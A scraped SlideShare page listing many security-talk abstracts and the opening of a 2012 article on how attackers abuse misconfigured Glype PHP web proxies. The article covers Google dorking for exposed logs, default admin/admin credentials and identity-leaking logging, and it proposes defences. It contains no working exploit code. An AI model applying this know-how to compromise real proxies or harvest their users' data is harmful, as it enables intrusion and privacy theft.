BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan... (Aditya K Sood)
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from real-time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate the step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored to make the testing easier for researchers.
Download from this link: http://secniche.org/blackhat-2014/
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
Big problems with big data – Hadoop interfaces security (SecuRing)
Did "cloud computing" and "big data" buzzwords bring new challenges for security testers?
Apart from the complexity of Hadoop installations and the number of interfaces, standard techniques can be applied to test for: web application vulnerabilities, SSL security and encryption at rest. We tested popular Hadoop environments and found a few critical vulnerabilities, which for sure cast a shadow on big data security.
ToorCon 14: Malandroid: The Crux of Android Infections (Aditya K Sood)
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is in large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
BlackHat Arsenal 2014 - C-SCAD: Assessing Security Flaws in C-SCAD WebX Clie... (Aditya K Sood)
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. The WebX client is hosted on the embedded web server which is shipped as a part of the complete ClearSCADA architecture. Primarily, the WebX client is restricted from performing any configuration changes, but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of the WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
Abusing Adobe Reader’s JavaScript APIs by Abdul-Aziz Hariri & Brian Gorenc - ... (CODE BLUE)
Adobe Reader’s JavaScript APIs offer a rich set of functionality for document authors. These APIs allow for processing forms, controlling multimedia events, and communicating with databases, all of which provide end-users the ability to create complex documents. This complexity provides a perfect avenue for attackers to take advantage of weaknesses that exist in Reader’s JavaScript APIs.
In this talk, we will provide insight into both the documented and undocumented APIs available in Adobe Reader. Several code auditing techniques will be shared to aid in vulnerability discovery, along with numerous proofs-of-concept which highlight real-world examples. We’ll detail how to chain several unique issues to obtain execution in a privileged context. Finally, we’ll describe how to construct an exploit that achieves remote code execution without the need for memory corruption.
Defeating Firefox by Muneaki Nishimunea - CODE BLUE 2015 (CODE BLUE)
The number of corporations establishing bug bounty programs in order to accomplish early discovery of vulnerabilities is increasing. So far, I have reported vulnerabilities in Firefox and received 45,000 USD (5,400,000 JPY) in bounties from the developer, which is the Mozilla Foundation. As a matter of fact, the vulnerabilities discovered in Firefox follow a trend; however, awareness of the trend has not been raised among the Firefox developers, and every time a new feature is implemented, a similar vulnerability is repeatedly created in the code. In this session, based on the vulnerabilities I have discovered in the past, I will introduce the patterns of vulnerabilities frequently observed in Firefox and delineate the root cause of those vulnerabilities. In addition, I will introduce my practical method that will allow you to effectively discover bugs in Firefox. This method is actually applicable not only to Firefox but to any other open source software, as it is based on an issue particular to open source software.
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic... (CODE BLUE)
Microsoft Exchange Server is an email solution widely deployed within government and enterprises, and it is an integral part of both their daily operations and security. Needless to say, vulnerabilities in Exchange have long been the Holy Grail for attackers, hence our security research on Exchange. Surprisingly, we've found not only critical vulnerabilities such as ProxyLogon, but a whole new attack surface of Exchange.
This new attack surface is based on a significant change in Exchange Server 2013, where the fundamental protocol handler, Client Access Service (CAS), splits into frontend and backend. In this fundamental change of architecture, quite an amount of design debt was incurred, and, even worse, it introduced inconsistencies between contexts, leading us to discover this new attack surface.
To unveil the beauty of this attack surface and our novel exploitation, we'll start by analyzing this architecture, followed by 7 vulnerabilities that consist of server-side bugs, client-side bugs, and crypto bugs found via this attack surface. In the end, these vulnerabilities are chained into 3 attack vectors that shine in different attack scenarios: ProxyLogon, ProxyShell, and ProxyOracle. These attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by ~400K Exchange Servers.
This attack surface has its unparalleled impact for a reason: security researchers tend to find vulnerabilities from a certain perspective, such as digging for memory bugs, injections, or logic flaws, but we took a different approach by looking at Exchange from a high-level architectural view and captured this architecture-level attack surface, which yielded multiple vulnerabilities. We hope this brings a new paradigm to vulnerability research and inspires more security researchers to look into Exchange Server. Last but not least, we'll provide hardening actions to mitigate such types of 0days in Exchange.
Secure coding is the practice of developing computer software in a way that guards against the accidental introduction of security vulnerabilities. Defects, bugs and logic flaws are consistently the primary cause of commonly exploited software vulnerabilities. Through the analysis of thousands of reported vulnerabilities, security professionals have discovered that most vulnerabilities stem from a relatively small number of common software programming errors. By identifying the insecure coding practices that lead to these errors and educating developers on secure alternatives, organizations can take proactive steps to help significantly reduce or eliminate vulnerabilities in software before deployment.
Session by: Akash S Prakash
Introduction to Web Application Security - Blackhoodie US 2018 (Niranjanaa Ragupathy)
This slide deck is structured to start from the basics of web application security and explore common web attacks. The first half is packed with theory; while we are all for jumping into exercises, having a solid grasp of the fundamentals will be crucial to your success in webappsec.
The deck dives into XSS, CSRF and SQL injections. It briefly outlines others like XXE, SSRF, logic errors, broken session management, and so on.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network... (CODE BLUE)
TeamT5 has helped many cyber-attack victims defend against APT actors for years. We have seen numerous cases showing that the actors still maintained their access to the victim network after some malware cleaning by inexperienced network managers or immature security teams. The main reason would be a lack of knowledge regarding threat actors’ techniques in lateral movement operations. For example, Microsoft Windows Active Directory plays a key role and dominates most corporate network environments for centralized management and authentication. However, there are many scenarios where improper security settings would cause Active Directory attacks to become a convenient way for threat actors to move around.
In this talk, we are going to present lateral movement methods to penetrate a corporate network environment and techniques to bypass security monitoring systems. All cases are based on our real experiences fighting with APT actors in recent years. We categorize them into 4 categories and list the items below:
1. AD Farm penetration techniques: mimilib, MemSSP, skeleton key, ACL abuse
2. Web-shell techniques: IIS module abuse, web source code injection, deserialization, rootkit
3. Second-tier backdoor techniques: DLL hijack, IAT insert, port reuse
4. Miscellaneous techniques: how actors move laterally in your network without malware or hacking tools.
The target audiences of this talk include security researchers, antivirus vendors, SOC team analysts and incident response teams. The techniques disclosed in this talk would help and facilitate blue team members to detect and understand threat actors’ footprints inside a corporate network and effectively block their activities.
Securing source code from loss or theft has historically been challenging due to the lack of security options available to deliver effective security without impacting developer productivity.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015 (CODE BLUE)
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, it certainly counts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly, the speaker here, from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude by deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
The Business Side of Windows 10 Apps - MS NetWork 6 (Alan Mendelevich)
Windows 10 opens the widest spectrum of devices to run your apps on. This provides tremendous opportunities but at the same time presents challenges of exposing your app to a mix of different types of users and monetizing it in such a diverse universe of usage scenarios. In this talk we will look at the ways of tackling just that.
8 Ways a Digital Media Platform is More Powerful than “Marketing” (New Rainmaker)
You may have heard that “media not marketing” is the future of online business … but what does that actually mean, what can it look like?
As you’ll see in this SlideShare, examples of a media-first approach done very well are all around us; it only takes a simple shift in thinking to see them.
Can this "media not marketing" approach to building an audience have an actual effect on the bottom line revenue of your business, or is it just more philosophical wordplay?
Let's find out ...
SlideShare now has a player specifically designed for infographics. Upload your infographics now and see them take off! Need advice on creating infographics? This presentation includes tips for producing stand-out infographics. Read more about the new SlideShare infographics player here: http://wp.me/p24NNG-2ay
This infographic was designed by Column Five: http://columnfivemedia.com/
No need to wonder how the best on SlideShare do it. The Masters of SlideShare provides storytelling, design, customization and promotion tips from 13 experts of the form. Learn what it takes to master this type of content marketing yourself.
10 Ways to Win at SlideShare SEO & Presentation Optimization (Oneupweb)
Thank you, SlideShare, for teaching us that PowerPoint presentations don't have to be a total bore. But in order to tap SlideShare's 60 million global users, you must optimize. Here are 10 quick tips to make your next presentation highly engaging, shareable and well worth the effort.
For more content marketing tips: http://www.oneupweb.com/blog/
Are you new to SlideShare? Are you looking to fine tune your channel plan? Are you using SlideShare but are looking for ways to enhance what you're doing? How can you use SlideShare for content marketing tactics such as lead generation, calls-to-action to other pieces of your content, or thought leadership? Read more from the CMI team in their latest SlideShare presentation on SlideShare.
Each month, join us as we highlight and discuss hot topics ranging from the future of higher education to wearable technology, best productivity hacks and secrets to hiring top talent. Upload your SlideShares, and share your expertise with the world!
Not sure what to share on SlideShare?
SlideShares that inform, inspire and educate attract the most views. Beyond that, ideas for what you can upload are limitless. We’ve selected a few popular examples to get your creative juices flowing.
How to Make Awesome SlideShares: Tips & Tricks (SlideShare)
Turbocharge your online presence with SlideShare. We provide the best tips and tricks for succeeding on SlideShare. Get ideas for what to upload, tips for designing your deck and more.
A Survey of Keylogger in Cybersecurity Education (ijtsrd)
Keylogger applications try to retrieve private information by covertly capturing user input through keystroke logging and then relaying this information to others, often for malicious purposes. Keyloggers therefore pose a major threat to business and personal activities such as Internet transactions, online banking, email, or chat. To cope with such threats, not only should users be made aware of this form of malware, but software practitioners and students should also be educated in the design, implementation, and monitoring of effective defenses against different keylogger attacks. This paper presents a case for incorporating keylogging in cybersecurity education. First, the paper presents an overview of keylogger applications, discusses keylogger design, implementation, and usage, and presents effective approaches to detect and prevent keylogging attacks. Second, the paper outlines several keylogging projects that may be integrated into an undergraduate computing program to train the next generation of cybersecurity practitioners on this crucial topic.
Raja Saha | Dr. Umarani Chellapandy, "A Survey of Keylogger in Cybersecurity Education", published in International Journal of Trend in Scientific Research and Development (ijtsrd), ISSN: 2456-6470, Volume 6, Issue 3, April 2022. URL: https://www.ijtsrd.com/papers/ijtsrd49471.pdf Paper URL: https://www.ijtsrd.com/computer-science/computer-security/49471/a-survey-of-keylogger-in-cybersecurity-education/raja-saha
How to 2FA-enable Open Source Applications (Extended Session)
Presented at: Open Source 101 at Home 2020
Presented by: Mike Schwartz, Gluu
Abstract: Your organization loves open source tools like Wordpress, SuiteCRM, NextCloud, RocketChat, and OnlyOffice... but most of these tools are protected with plain old passwords. You want to use two-factor authentication... but how? In this workshop, you'll learn:
- Which 2FA technologies can be used without paying a license;
- How to enable users to enroll and delete 2FA credentials;
- How to configure open source applications to act as a federated relying party, delegating authentication to a central service;
- How custom applications can act as a federated relying party.
Security has been identified as the major concern for the agent paradigm for two reasons. First, foreign code that executes on a site shares that site's services and resources with local processes and other agents. Services can include electronic commerce utilities. Resources include the file system, the GUI and the network server, as well as memory and CPU. It is difficult for a site to ensure that no agent can steal information or corrupt another agent or shared resource. The second security problem is that the agent itself can be circumvented by a malicious site, which may steal or corrupt agent data or simply destroy the agent. To solve these problems, we build a mini password manager written in Java. Then we incorporate the mini password manager into the simple web server to authenticate users that would like to download documents and resources. The goal of this paper is to accentuate the positive aspects that agents bring to Internet security.
Messages addressed to specific users can be decrypted by Key Generation Centre (KGC) by generating their private keys. Data owner wants the data to be delivered only to specified user and not to unauthorized person that is the data owner makes their private data accessible only to authorized person. We propose attribute based encryption and escrow problem which means written agreement delivered to a third party to overcome this problem. Attribute based Encryption (ABE) is a type of public-key encryption in which the private key of a user and the cipher text are dependent upon attributes. It is a promising cryptographic approach.
Implementation of user authentication as a service for cloud networkSalam Shah
There are so many security risks for the users of cloud computing, but still the organizations are switching towards the cloud. The cloud provides data protection and a huge amount of memory usage remotely or virtually. The organization has not adopted the cloud computing completely due to some security issues. The research in cloud computing has more focus on privacy and security in the new categorization attack surface. User authentication is the additional overhead for the companies besides the management of availability of cloud services. This paper is based on the proposed model to provide central authentication technique so that secured access of resources can be provided to users instead of adopting some unordered user authentication techniques. The model is also implemented as a prototype.
International Refereed Journal of Engineering and Science (IRJES)irjes
International Refereed Journal of Engineering and Science (IRJES) is a leading international journal for publication of new ideas, the state of the art research results and fundamental advances in all aspects of Engineering and Science. IRJES is a open access, peer reviewed international journal with a primary objective to provide the academic community and industry for the submission of half of original research and applications
Describe briefly the OSI Reference model and its relevance to computer security. [4 Marks]
• Ans 1: The Open System Interconnection Model (OSI) is a standardized framework for describing how computers communicate with each other over a network system. The OSI model also conceptualizes how data flows through a stack of seven layers, beginning with the physical layer and continuing through the datalink, network, transport, session, presentation, and finally the application layer (Simoneau, 2006)
1croreprojects is the best hybrid cloud system for all area and also developing realtime projects, phd projects are fully developed in our institute. We have been effectively in providing solutions for different challenges across a wide range of market and customers propagate across the globe.
Identity theft through keyloggers has become very popular the last years. One of the most common ways to intercept and steal victim's data are to use a keylogger that transfers data back to the attacker. Covert keyloggers exist either as hardware or software. In the former case they are introduced as devices that can be attached to a computer (e.g. USB sticks), while in the latter case they try to stay invisible and undetectable as a software in the operating system. Writing a static keylogger which operates locally in victim's machine is not very complex. In contrast, the creation of covert communication between the attacker and the victim, and still remain undetectable is more sophisticated. In such a scenario we have to define how data can be delivered to the attacker and how we can make an efficient use of the channel that transfers the information over the network in order to stay undetectable. In this paper we propose a system based on Steganography that takes advantage of a seemingly innocuous Social Network (Tumblr) in order to avoid direct communication between the victim and the attacker. A core part of this study is the security analysis which is also discussed by presenting experimental results of the system and describing issues regarding surveillance resistance of the system as well as limitations.
Web application vulnerabilities involve a system flaw or weakness in a web-based application. They have been around for years, largely due to not validating or sanitizing form inputs, misconfigured web servers, and application design flaws, and they can be exploited to compromise the application's security.
Welcome to the next edition of our Monthly Digest, your one-stop resource for staying informed on the most recent developments, insights, and best practices in the ever-evolving field of security. In this issue, we have curated a diverse collection of articles, news, and research findings tailored to both professionals and casual enthusiasts. Our digest aims to make our content is both engaging and accessible. Happy reading
(https://boosty.to/overkill_security + check original source urls inside)
Similar to Abusing Glype Proxies - Attacks, Exploits and Defences (20)
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Elasticsearch infections are rising exponentially. The adversaries are exploiting open and exposed Elasticsearch interfaces to trigger infections in the cloud and non-cloud deployments. During this talk, we will release a tool named "STRAFER" to detect potential infections in the Elasticsearch instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected Elasticsearch instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
A tale of scale & speed: How the US Navy is enabling software delivery from l...sonjaschweigert1
Rapid and secure feature delivery is a goal across every application team and every branch of the DoD. The Navy’s DevSecOps platform, Party Barge, has achieved:
- Reduction in onboarding time from 5 weeks to 1 day
- Improved developer experience and productivity through actionable findings and reduction of false positives
- Maintenance of superior security standards and inherent policy enforcement with Authorization to Operate (ATO)
Development teams can ship efficiently and ensure applications are cyber ready for Navy Authorizing Officials (AOs). In this webinar, Sigma Defense and Anchore will give attendees a look behind the scenes and demo secure pipeline automation and security artifacts that speed up application ATO and time to production.
We will cover:
- How to remove silos in DevSecOps
- How to build efficient development pipeline roles and component templates
- How to deliver security artifacts that matter for ATO’s (SBOMs, vulnerability reports, and policy evidence)
- How to streamline operations with automated policy checks on container images
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Monitoring Java Application Security with JDK Tools and JFR Events
Abusing Glype Proxies - Attacks, Exploits and Defences
FEATURE
Network Security, December 2012 (p. 8)
Abusing Glype proxies: attacks, exploits and defences
Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs, and Richard J Enbody, Michigan State University
Proxies play a critical privacy role because they are widely used for anonymous surfing and identity cloaking on the Internet. In addition, proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. There are several types of proxies available, but the Glype HTTP proxy is used extensively.[1]
Glype is an open source proxy written in PHP and is freely available for personal use. It can also be licensed for commercial use, and is available as an add-on for Firefox as Proxilla.[2] The basic idea of a web proxy is to download requested web pages, modify them according to a set of proxy rules, and then forward them to the user. By standing between the user and the rest of the web, the proxy can provide some anonymity to the user in addition to other services.
Proxies can also be transformed into attack platforms for exploitation. For example, misconfigured proxies can be exploited by an attacker to steal sensitive information from users. Our study focuses on various attacks and the distribution of malware using Glype proxies. We present a model of the approach used by attackers to transform a Glype proxy into an attack toolkit for spreading infections. For our experiments, we have used Glype versions 1.1 and 1.4. We will present details about the features of Glype proxies that help attackers, and we will conclude by proposing countermeasures.
Background
A number of studies have been conducted in the past regarding the use of public proxies as attack platforms. SANS, a co-operative research and security institution, conducted two studies on the integrity of public proxies. The first, by Powers, discussed the possibility of malware in public proxy lists.[3] The study focused on tracking the Koobface malware that used open ports for incoming connections and hid operations behind proxies through proxy lists. The other, by Brozycki, presented techniques for detecting proxies that provide anonymous access and proposed methods to defend against them using blacklisting and active monitoring.[4] A number of IDS rules were proposed by Brozycki to prevent users from accessing blocked content inside a network. In this paper, we do not cover network-level anonymisers such as VPNs and TOR. The concept of this paper revolves around web-based anonymity using server-side web proxies. The primary difference between the TOR network and web-based proxies is that TOR implements multi-tier (multi-layer) anonymity before forwarding the traffic to the destination, whereas web proxies have a two-tier (single-server) architecture.[5] In other words, the difference is in the implementation of relays and routing the traffic between endpoints.
Huang et al discussed cache-poisoning attacks in transparent proxies using socket Application Programming Interfaces (APIs) in Java and Flash.[6] Cache-poisoning attacks exploit transparent proxies that are configured to route traffic based on the HTTP 'Host:' header while caching at the same time. An attacker poisons the Host: header in the cache using a malicious Flash or Java file that downloads the policy file from the attacker's server. Cache-poisoning attacks are quite common in network proxies. The Swiss Security Team discussed the inability of Glype proxies to hide the user's identity entirely.[7] Its study showed how misconfiguration in Glype proxies can lead to the disclosure of sensitive information.
Dissecting Glype
The primary purpose of the Glype proxy is to provide the capability of anonymous surfing. However, attackers can also transform a Glype proxy into a malware infection platform. To understand the attacks, it is important to understand the characteristics of Glype proxies.
To provide proxy services, each URL and each page's internal links are encoded using a simple base-64 encoding. For example, consider this URL:
hxxp://[Glype_proxy_url]/proxy/browse.php?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer
This contains the string 'Oi8vc2NyaXB0bWFmaWEub3JnLw'. A simple base-64 decoding of this string results in '://scriptmafia.org', which shows that the URL decoding process is simple. Care is needed to handle special characters because the Glype proxy follows the PHP-based encoding/decoding mechanism in which special characters present in variable names are encoded to maintain compatibility with registered global variables.
The Glype proxy can be extended using plugins. For example, popular websites such as Facebook, Twitter and Gmail have separate plug-ins for the Glype proxy. Web page processing is handled using Glype's 'process.php' page. For simplicity, the Glype proxy injects JavaScript code in web pages to avoid sending requests to the process.php page using HTTP POST requests. The Glype proxy uses HTTP headers such as 'Referer:' and 'Location:' for redirection purposes.
Google can be used to search for misconfigured Glype proxies. By default, Glype logs its activities with a log folder in the /tmp directory (/tmp/log). Knowing the location of the log allows a malicious user to easily craft efficient Google queries with Google dorks to search for misconfigured proxies.
The Glype proxy has default credentials {username=admin, password=admin}. The password is hardcoded as an MD5 hash, but is susceptible to brute-force attack. For secure configurations, the hash should be replaced. In addition, in its default configuration, the Glype proxy uses no cache. Listing 1 shows the implementation of the cache module in the Glype proxy. However, it is still possible to configure the Glype proxy to send some cache headers using session_cache_limiter('private_no_expire').
Glype proxies suffer from several design flaws that are exploited by attackers. Some of the issues that make Glype proxies an effective hacker tool are discussed below.
Logging mechanism
By design, the Glype proxy is supposed to provide anonymity for its users. Unfortunately, weaknesses exist that can leak information about a user's identity. Since Glype is written in PHP, an attacker can perform several modifications to make the Glype proxy a tool for successful execution of attacks. There are different kinds of information that attackers can easily steal by misconfiguring the parameters of the Glype proxy and writing an advanced plugin for capturing data. Listing 2 shows the type of information logged when the user surfs a website through a Glype proxy. It basically captures GET requests and provides information about IP addresses visited.
Listing 1: Cache module in the Glype proxy
# Send no-cache headers.
function sendNoCache()
{
    header( 'Cache-Control: no-store, no-cache, must-revalidate' );
    header( 'Cache-Control: post-check=0, pre-check=0', false );
    header( 'Pragma: no-cache' );
}
Listing 2: Logs in Glype proxy
68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=8
68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
